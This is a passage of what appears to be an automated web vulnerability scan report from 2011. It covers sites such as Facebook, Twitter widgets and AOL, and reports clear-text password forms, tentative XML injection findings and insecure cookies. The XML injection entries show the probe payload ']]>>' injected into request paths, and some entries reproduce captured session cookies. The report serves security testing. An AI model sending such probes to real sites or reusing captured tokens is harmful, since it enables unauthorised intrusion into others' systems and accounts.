Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

8.28. http://www.facebook.com/r.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/r.php

The form contains the following password field:

reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.252.126
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 29390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

8.29. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

The form contains the following password field:

AuthorPassword

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>

<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
<div id="cmttabs">
...[SNIP]...
<br />
<input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

8.30. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545

The form contains the following password field:

AuthorPassword

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</h3>

<form action="#comments" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
<div id="cmttabs">
...[SNIP]...
<br />
<input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/></label>
...[SNIP]...

9. XML injection previous next
There are 11 instances of this issue:

http://jb.speakertext.com/player/speakertext.css [REST URL parameter 1]
http://jb.speakertext.com/player/speakertext.css [REST URL parameter 2]
http://pixel.quantserve.com/seg/r [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 1]
http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 2]
http://use.typekit.com/p/uni0vle.js [REST URL parameter 1]
http://use.typekit.com/p/uni0vle.js [REST URL parameter 2]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

9.1. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://jb.speakertext.com
Path:	/player/speakertext.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /player]]>>/speakertext.css?ver=MU HTTP/1.1
Host: jb.speakertext.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 038D24CD571B18A1
x-amz-id-2: 7naTM3ed3SWLL3cYgw6RKthpaVBs5uJ59vqJBHZVrRMvoDyvoHyaSsDoXJOqS35k
Content-Type: application/xml
Date: Thu, 05 May 2011 01:19:48 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>038D24CD571B18A1</RequestId><HostId>7naTM3ed3SWLL3cYgw6RKthpaVBs5uJ59vqJBHZVrRMvoDyvoH
...[SNIP]...

9.2. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://jb.speakertext.com
Path:	/player/speakertext.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /player/speakertext.css]]>>?ver=MU HTTP/1.1
Host: jb.speakertext.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 9233A4E4EBE7FCE9
x-amz-id-2: d+F1roNSInSZTY3lL/t8kiFRCyYvMBbki/FyumBOU7NPco+CBU3qY48AhHyOpYJz
Content-Type: application/xml
Date: Thu, 05 May 2011 01:19:51 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9233A4E4EBE7FCE9</RequestId><HostId>d+F1roNSInSZTY3lL/t8kiFRCyYvMBbki/FyumBOU7NPco+CBU
...[SNIP]...

9.3. http://pixel.quantserve.com/seg/r [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://pixel.quantserve.com
Path:	/seg/r

Issue detail

Request

GET /seg]]>>/r;a=p-54JT4Ioyi-32M;rand=1304557128;redirect=http://ads.undertone.com/fc.php?dp=8&pid=!qcsegs HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EBYAGO8kjVmtjIMIufKMgQG0AQHWBoHzAJrRo6lXiz0dKj2VMAiz0dSizF8QGjTBH-EQQBwSAAADBAGFoogRu2CWsYNcdDECEYILsywS0zgSggMC4a4w_xkgDokgDhAL4gtksQgtGLKxlKOLIw

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Thu, 05 May 2011 01:25:05 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1304575123514&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&lang=en&related=parislemon%3AAuthor%20of%20the%20post&text=100%2C000%20Developers%20Strong%2C%20Mashery%20Nabs%20%2411%20Million%20To%20Push%20The%20Internet%20Beyond%C2%A0Websites&url=http%3A%2F%2Ftcrn.ch%2Fk1UgaS&via=techcrunch HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:36 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]>>/tweet_button.html</Key><RequestId>BCB94C009E887B79</Reque
...[SNIP]...

9.5. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform0.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1304575123514&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&lang=en&related=parislemon%3AAuthor%20of%20the%20post&text=100%2C000%20Developers%20Strong%2C%20Mashery%20Nabs%20%2411%20Million%20To%20Push%20The%20Internet%20Beyond%C2%A0Websites&url=http%3A%2F%2Ftcrn.ch%2Fk1UgaS&via=techcrunch HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:38 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]>></Key><RequestId>F717764FD2EDB0E1</Reque
...[SNIP]...

9.6. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform1.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1304575123516&count=horizontal&counturl=http%3A%2F%2Fwww.crunchgear.com%2F2011%2F05%2F04%2Fcontest-away-put-your-weapon-i-mean-you-to-win-a-star-wars-prize%2F&lang=en&related=johnbiggs%3AAuthor%20of%20the%20post&text=Contest%3A%20Away%20Put%20Your%20Weapon%2C%20I%20Mean%20You%20To%20Win%20A%20Star%20Wars%C2%A0Prize&url=http%3A%2F%2Ftcrn.ch%2Fli2f8d&via=techcrunch HTTP/1.1
Host: platform1.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

9.7. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform1.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1304575123516&count=horizontal&counturl=http%3A%2F%2Fwww.crunchgear.com%2F2011%2F05%2F04%2Fcontest-away-put-your-weapon-i-mean-you-to-win-a-star-wars-prize%2F&lang=en&related=johnbiggs%3AAuthor%20of%20the%20post&text=Contest%3A%20Away%20Put%20Your%20Weapon%2C%20I%20Mean%20You%20To%20Win%20A%20Star%20Wars%C2%A0Prize&url=http%3A%2F%2Ftcrn.ch%2Fli2f8d&via=techcrunch HTTP/1.1
Host: platform1.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

9.8. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform2.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets]]>>/tweet_button.html?_=1304575123517&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmerchantcircle-debuts-iphone-app-for-small-businesses-to-manage-marketing%2F&lang=en&related=leenarao%3AAuthor%20of%20the%20post&text=MerchantCircle%20Debuts%20iPhone%20App%20For%20Small%20Businesses%20To%20Manage%C2%A0Marketing&url=http%3A%2F%2Ftcrn.ch%2FlTiWaS&via=techcrunch HTTP/1.1
Host: platform2.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:37 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]>>/tweet_button.html</Key><RequestId>09FFDC161539EB6F</Reque
...[SNIP]...

9.9. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform2.twitter.com
Path:	/widgets/tweet_button.html

Issue detail

Request

GET /widgets/tweet_button.html]]>>?_=1304575123517&count=horizontal&counturl=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmerchantcircle-debuts-iphone-app-for-small-businesses-to-manage-marketing%2F&lang=en&related=leenarao%3AAuthor%20of%20the%20post&text=MerchantCircle%20Debuts%20iPhone%20App%20For%20Small%20Businesses%20To%20Manage%C2%A0Marketing&url=http%3A%2F%2Ftcrn.ch%2FlTiWaS&via=techcrunch HTTP/1.1
Host: platform2.twitter.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 294
Date: Thu, 05 May 2011 01:23:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/tweet_button.html]]>></Key><RequestId>51F25A83325C58D1</Reque
...[SNIP]...

9.10. http://use.typekit.com/p/uni0vle.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://use.typekit.com
Path:	/p/uni0vle.js

Issue detail

Request

GET /p]]>>/uni0vle.js?1304575102706 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Thu, 05 May 2011 01:18:56 GMT
Expires: Thu, 05 May 2011 01:23:56 GMT
Server: EOS (lax001/54D7)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.11. http://use.typekit.com/p/uni0vle.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://use.typekit.com
Path:	/p/uni0vle.js

Issue detail

Request

GET /p/uni0vle.js]]>>?1304575102706 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=300
Content-Type: text/html
Date: Thu, 05 May 2011 01:19:05 GMT
Expires: Thu, 05 May 2011 01:24:05 GMT
Server: EOS (lax001/54D6)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

10. SSL cookie without secure flag set previous next
There are 29 instances of this issue:

https://twitter.com/signup
https://www.fightmagazine.com/mma-magazine/subscribe.asp
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://account.login.aol.com/_cqr/opr/opr.psp
https://aolproductcentral.aol.com/ClickBroker
https://bill.aol.com/SPortal/jsp/main.jsp
https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp
https://maps-api-ssl.google.com/maps
https://my.screenname.aol.com/_cqr/login/checkStatus.psp
https://my.screenname.aol.com/_cqr/login/jslogin.psp
https://my.screenname.aol.com/_cqr/login/login.psp
https://my.screenname.aol.com/_cqr/logout/mcLogout.psp
https://my.screenname.aol.com/badbrowser.psp
https://us.etrade.com/e/t/welcome/whychooseetrade
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

10.1. https://twitter.com/signup previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://twitter.com
Path:	/signup

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup?follow=saritaa_raqueel&context=profile HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://twitter.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
